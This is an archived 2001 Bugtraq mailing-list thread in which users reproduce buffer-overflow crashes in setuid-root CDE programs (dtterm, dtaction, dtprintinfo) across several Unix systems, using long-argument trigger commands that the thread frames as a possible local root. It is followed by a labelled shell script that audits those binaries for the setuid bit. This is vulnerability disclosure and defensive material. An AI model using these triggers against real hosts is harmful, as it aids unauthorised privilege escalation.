From: Bob Dog (bobdogdrunk.co.nz)
Date: Wed Oct 03 2001 - 17:07:43 CDT


    This also works for the following on Tru64 5.1;

    $ /usr/dt/bin/dtaction `perl -e 'print "A"x8203'`
    Memory fault(coredump)

    $ /usr/dt/bin/dtprintinfo -session `perl -e 'print "A"x8203'`
    Memory fault(coredump)

    All of these; dtterm, dtaction and dtprintinfo
    are SUID root by default.

    --- Bob Dog <bobdogdrunk.co.nz> wrote:
    >I could reproduce this on Tru64 5.1 on an AlphaStation
    >but I had to go all the way to 8203. Using values
    >below 4590 caused no problems. Starting at values
    >of 4590 up to 8202 a dtterm window will open normally
    >and everything seems normal but the 'clear' command
    >will cause a coredump. However, the terminal window will
    >still remain active. Other commands don't seem to cause
    >problems.
    >
    >$ uname -a
    >OSF1 red5 V5.1 732 alpha
    >$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x8203'`
    >Memory fault(coredump)
    >
    >Bob
    >
    >
    >--- "Cushing, David" <David.Cushinghitachisoftware.com> wrote:
    >>I was able to reproduce this on a Solaris 8 sparc machine with different
    >>tolerances:
    >>
    >>[288] uname -a
    >>SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
    >>[289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
    >>Segmentation Fault(coredump)
    >>[297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
    >>Bus Error(coredump)
    >>ginger:dcushing[298]
    >>
    >>-David
    >>
    >>> -----Original Message-----
    >>> From: Aycan Irican [mailto:aycanmars.prosoft.com.tr]
    >>> Sent: Tuesday, October 02, 2001 1:55 AM
    >>> To: bugtraqsecurityfocus.com
    >>> Cc: evrimenvy.com.tr
    >>> Subject: OpenUNIX 8 & Unixware possible local root
    >>>
    >>>
    >>> -----BEGIN PGP SIGNED MESSAGE-----
    >>> Hash: SHA1
    >>>
    >>> Another dt series bug...
    >>>
    >>> $ uname -a
    >>> OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
    >>> $ id
    >>> uid=101(fixxxer) gid=1(other)
    >>> $ ls -al /usr/dt/bin/dtterm
    >>> - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03 /usr/dt/bin/dtterm
    >>> $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
    >>> Warning: Missing charsets in String to FontSet conversion
    >>> Warning: Missing charsets in String to FontSet conversion
    >>> Memory fault
    >>> .. snip ..
    >

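
Added example, not part of the original message or thread: a POSIX shell check that reports which of the binaries named above (dtterm, dtaction and dtprintinfo under /usr/dt/bin) still carry the set-user-ID bit on a given host. The function name `audit_setuid`, the `DT_BIN_DIR` variable and the output format are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original thread): report which of the CDE
# binaries named in the message still carry the set-user-ID bit.
# The directory and binary names come from the message; the function
# name, variable names and output format are this example's own.

DT_BIN_DIR="${DT_BIN_DIR:-/usr/dt/bin}"
DT_BINARIES="dtterm dtaction dtprintinfo"

# audit_setuid DIR NAME...
# Prints one line per existing regular file that has the setuid bit set:
#   <path> uid=<numeric owner> mode=<ls mode string>[ SETUID-ROOT]
# Returns 0 when no setuid file was found, 1 when at least one was.
audit_setuid() {
    dir=$1; shift
    found=0
    for name in "$@"; do
        path="$dir/$name"
        # Only existing regular files are of interest.
        [ -f "$path" ] || continue
        # test -u is true when the set-user-ID bit is set.
        [ -u "$path" ] || continue
        # ls -ln prints the numeric owner, so no passwd lookup is needed.
        info=$(ls -lnd "$path" | awk '{print $1 " " $3}')
        mode=${info% *}
        uid=${info#* }
        tag=""
        # uid 0 means the program runs with root privileges for any caller.
        [ "$uid" = "0" ] && tag=" SETUID-ROOT"
        echo "$path uid=$uid mode=$mode$tag"
        found=1
    done
    return "$found"
}

# Check the live system; on a host without CDE this prints nothing.
audit_setuid "$DT_BIN_DIR" $DT_BINARIES || echo "review the files listed above" >&2
```

A non-zero return from `audit_setuid` means at least one listed file is setuid, so the function can gate a cron job or a configuration-management run.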